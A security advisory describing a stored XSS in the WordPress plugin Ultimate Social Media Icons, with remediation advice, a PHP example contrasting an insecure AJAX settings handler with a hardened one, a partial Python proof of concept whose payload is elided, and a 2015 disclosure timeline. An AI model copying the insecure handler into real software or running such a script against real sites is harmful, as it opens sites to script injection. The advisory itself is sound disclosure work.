Ultimate Social Media and Share Icons, Persistent XSS

The Ultimate Social Media Icons plugin exposes several AJAX methods to every authenticated user, regardless of role (see ultimate-social-media-icons/libs/controllers/sfsi_buttons_controller.php). These methods update the plugin's settings for how its buttons and accompanying text are displayed on the site. Because the methods enforce neither a capability check nor a nonce, and do not sanitize their input, a low-privileged user (a subscriber, for example) can supply crafted values for a few specific parameters and store a script payload in the plugin settings. The stored payload is then rendered on every page of the site, including the plugin's settings screen in the administration panel, making this a persistent (stored) XSS that reaches site visitors and administrators alike.



CVSS Score

CVSS Vector

Attack Scope

Authorization Required


Implement nonce checks and capability (role-based) access control on all sensitive AJAX methods. Sanitize the user input these methods accept before storing it, and escape the stored values where they are output, on the public site and on the settings screen.
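The pattern behind the issue and the fix recommended above, as an added illustration that is not code from the Ultimate Social Media Icons plugin or from the original advisory. The action names, option key, script handle and parameter name (share_text) are assumptions chosen to show the shape of an unprotected settings handler next to a hardened one; the WordPress functions used are the standard ones for this purpose.

```php
<?php
// Added illustration, not the plugin's own code. Handler names, the option key
// 'example_share_text', the script handle 'example-settings' and the
// parameter 'share_text' are assumptions.

// --- Vulnerable pattern: the wp_ajax_ hook is reachable by any logged-in user,
// there is no nonce, no capability check, and the raw value is stored and
// later echoed unescaped on every page and on the settings screen.
add_action( 'wp_ajax_example_save_share_text_insecure', 'example_save_share_text_insecure' );
function example_save_share_text_insecure() {
    update_option( 'example_share_text', $_POST['share_text'] ); // stored as-is
    echo 'saved';
    wp_die();
}

// --- Hardened handler: nonce + capability check + sanitization on input,
// escaping on output.
add_action( 'wp_ajax_example_save_share_text', 'example_save_share_text_secure' );
function example_save_share_text_secure() {
    // 1. CSRF: the request must carry a nonce issued for this action
    //    (sent in the 'security' field); check_ajax_referer() dies otherwise.
    check_ajax_referer( 'example_share_settings', 'security' );

    // 2. Authorization: changing plugin settings is an administrator task,
    //    so a subscriber-level account is rejected here.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Input validation: the setting is a plain-text label, so strip tags
    //    and control characters, and bound its length.
    $text = isset( $_POST['share_text'] )
        ? sanitize_text_field( wp_unslash( $_POST['share_text'] ) )
        : '';
    if ( mb_strlen( $text ) > 100 ) {
        wp_send_json_error( 'too long', 400 );
    }

    update_option( 'example_share_text', $text );
    wp_send_json_success( array( 'share_text' => $text ) );
}

// The nonce has to reach the settings-page script that makes the AJAX call;
// this assumes a script registered under the handle 'example-settings'.
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'example-settings', 'exampleSettings', array(
        'ajaxUrl'  => admin_url( 'admin-ajax.php' ),
        'security' => wp_create_nonce( 'example_share_settings' ),
    ) );
} );

// 4. Output escaping: even a sanitized option is escaped at the point of
//    rendering, both in the public front end and in the admin settings form,
//    so a value that slipped past input filtering cannot execute.
function example_render_share_text() {
    $text = get_option( 'example_share_text', '' );
    echo '<span class="share-text">' . esc_html( $text ) . '</span>';
}

function example_render_share_text_field() {
    $text = get_option( 'example_share_text', '' );
    echo '<input type="text" name="share_text" value="' . esc_attr( $text ) . '">';
}
```

Any one of the three input-side controls would have blocked the PoC below (a subscriber has no valid nonce and lacks manage_options, and sanitize_text_field() removes the script tag); output escaping is the defence in depth that also protects the administrator viewing the settings screen if a payload is ever stored by another route.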

Proof of Concept

The following PoC results in a JavaScript alert being displayed on every page of the site, including the settings screen for the plugin in the administration panel.

import requests

s = requests.session()
target = 'http://localhost'

# Step 1: log in as any registered user; these are the standard WordPress
# login form fields, the credentials are placeholders.
url = '%s/wp-login.php' % target
payload = {
    'log': 'subscriber', 'pwd': 'password',
    'wp-submit': 'Log In', 'testcookie': '1',
}
r = s.post(url, data=payload)

# Step 2: call the unprotected AJAX method with the crafted settings values.
# The action name and plugin parameters are elided in this copy of the advisory.
url = '%s/wp-admin/admin-ajax.php' % target
payload = {}
r = s.post(url, data=payload)
print(r.status_code)


  • 2015-05-15: Discovered
  • 2015-05-15: Vendor notified
  • 2015-05-15: Vendor responded
  • 2015-05-23: Version released – issue resolved
  • 2015-05-30: Advisory released